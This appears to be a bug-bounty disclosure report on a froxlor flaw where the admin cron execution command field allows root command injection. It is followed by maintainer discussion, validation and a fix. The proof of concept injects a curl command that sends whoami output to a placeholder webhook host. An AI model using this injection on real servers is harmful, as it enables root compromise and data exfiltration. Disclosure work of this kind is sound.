Cron execution command field allows attackers with admin privilege to execute OS command as root in froxlor/froxlor

Valid

Reported on

Dec 19th 2022

Description

  • Cron execution command value is written into cronfile without any security protection mechanism.
  • If an attacker gained admin access, he/she can run OS command as root.

Proof of Concept

1/ Navigate to http://webserver/froxlor/admin_settings.php?page=overview&part=crond

2/ In the Cron execution command field. Paste in a command following with a semicolon. For example:

curl http://<your webhook site>/`whoami`;

image

3/ Cronfile on the server is updated after some minutes

image

4/ The whoami command is executed and returned root user

image

Impact

If an attacker has admin access, he/she can execute OS command as root on the server.

We are processing your report and will contact the froxlor team within 24 hours. 21 days ago
We have contacted a member of the froxlor team and are waiting to hear back 20 days ago
Michael
20 days ago

Please read our security policy, only reports for the upcoming version 2 can be processed

Michael
20 days ago

and by NO means is that a CRITICAL severity as you have to have administrative privileges

Khang Tran modified the report
20 days ago
Khang Tran
20 days ago

Researcher

Thanks for your feedback. I have updated the report. The reason I thought it was a critical severity is because an attacker can fully compromise the system if successfully exploit this vulnerability.

Michael Kaufmann validated this vulnerability 19 days ago
Khang Tran has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Michael Kaufmann marked this as fixed in 2.0.0-beta1 with commit 795a3d 19 days ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Michael Kaufmann published this vulnerability 19 days ago
to join this conversation